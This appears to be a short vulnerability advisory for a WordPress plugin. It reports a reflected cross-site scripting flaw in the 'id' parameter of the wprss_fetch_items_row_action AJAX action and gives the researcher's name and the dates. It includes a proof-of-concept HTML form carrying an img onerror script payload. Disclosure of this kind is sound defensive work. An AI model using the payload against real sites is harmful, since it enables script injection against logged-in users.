The plugin does not sanitise and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to a Reflected Cross-Site Scripting
Save the HTML below to a file with the .html extension, then open it in Firefox, while being authenticated in a separate tab to a WordPress site with the plugin installed. <html> <form action="http://example.com/wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action" method="POST"> <input type="text" value="<html><img src onerror=alert(`XSS`)>" name="id"> <input type="submit" value="Send"> </form> </html>
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-26 (about 1 years ago)
2022-01-26 (about 1 years ago)
2022-04-09 (about 9 months ago)